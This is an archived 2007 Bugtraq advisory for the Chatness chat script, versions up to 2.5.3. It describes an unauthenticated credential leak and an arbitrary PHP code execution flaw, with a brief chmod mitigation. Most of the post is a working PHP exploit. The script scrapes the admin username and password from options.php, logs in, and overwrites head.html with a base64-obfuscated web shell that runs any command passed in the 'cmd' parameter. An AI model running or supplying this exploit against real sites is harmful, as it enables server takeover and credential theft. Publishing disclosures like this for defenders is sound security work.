lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: 12 Apr 2007 21:20:26 -0000
From: jd2k2000@...mail.com
To: bugtraq@...urityfocus.com
Subject: Chatness <= 2.5.3 - Arbitrary Code Execution

<?/*
Files: options.php, save.php
Affects: Chatness <= 2.5.3
Date: 12th April 2007

Issue Description:
===========================================================================
Chatness suffers with two main vulnerabilities, the first of these in 
/admin/options.php the problems occur because the script first fails to 
verify if the user is in fact an administrator and secondly it prints the
administrators username and password in plain text as part of the pre-filled 
form.

The second issue occurs in /admin/save.php and /index.php while save.php
limits writing to just .html extended filenames it is possible for an 
attacker to overwrite either foot.html or head.html to contain arbitrary php
code which would then be executed when included by index.php
===========================================================================

Scope:
===========================================================================
Combined these two seperate issues will allow an attacker to gain access to
the system and execute code/commands of their choice.
===========================================================================

Recommendation:
===========================================================================
Until a patch is availible it would be advisable to chmod both foot.html
and head.html to a mode that makes them unwritable by the web server, this
will minimize the risk of arbitrary code execution.
===========================================================================

Discovered By: Gammarays
*/?>


<?php

echo "########################################################\n";
echo "#   Special Greetings To - Timq,Warpboy,The-Maggot     #\n";
echo "########################################################\n\n\n";

$payload = "JTNDJTNGcGhwK2lmJTI4aXNzZXQlMjglMjRfR0VUJTVCJTI3Y21kJTI3JTVEJTI5JTI5JTdCZWNobytzaGVsbF9leGVjJTI4dXJsZGVjb2RlJTI4JTI0X0dFVCU1QiUyN2NtZCUyNyU1RCUyOSUyOSUzQmRpZSUyOCUyOSUzQiU3RCUzRiUzRQ==";
$payload = base64_decode($payload);


if($argc!=2) die("Usage: <url> \n\tEx: http://www.example.com/chatness/\n");

$url = $argv[1];

$ch = curl_init($url . "admin/options.php");
if(!$ch) die("Error Initializing CURL");

echo "[ ] Attempting To Fetch Admin Login...\n";
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$res = curl_exec($ch);
if(!$res) die("Error Connecting To Target");

$httpresult = curl_getinfo($ch,CURLINFO_HTTP_CODE);
if($httpresult!=200) die("Error - URL Appears To Be Incorrect");

//Not good - but it works...sometimes
$junkarray = explode("id=",$res);
$junkarray = explode("\"",$junkarray[14]);
$username = $junkarray[3];

$junkarray = explode("id=",$res);
$junkarray = explode("\"",$junkarray[15]);
$password = $junkarray[3];

echo "[ ] Found Username And Password - ".$username." / ".$password."\n";
echo "[ ] Logging In...\n";

//Login
curl_setopt($ch, CURLOPT_URL,$url . "admin/login.php");
curl_setopt($ch, CURLOPT_COOKIEJAR, "mrcookie.dat");
curl_setopt($ch, CURLOPT_POST,1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"user=".$username."&pass=".$password."&submit=Login");
$res = curl_exec($ch);
if(!res) die("Error Connecting To Target");

$httpresult = curl_getinfo($ch,CURLINFO_HTTP_CODE);
if($httpresult==200) die("Error Invalid Username/Password");

echo "[ ] Login Succeeded..\n";

//Deploy Main Payload
curl_setopt($ch, CURLOPT_URL,$url . "admin/save.php?file=head");
curl_setopt($ch, CURLOPT_COOKIEFILE, "mrcookie.dat");
curl_setopt($ch, CURLOPT_POSTFIELDS,"html=".$payload);
$res = curl_exec($ch);
if(!res) die("Error Connecting To Target");

echo "[ ] Payload Deployed\n";
echo "[ ] Shell Accessible at ".$url."index.php?cmd=<yourcommand>";
curl_close($ch);
?> 

Powered by blists - more mailing lists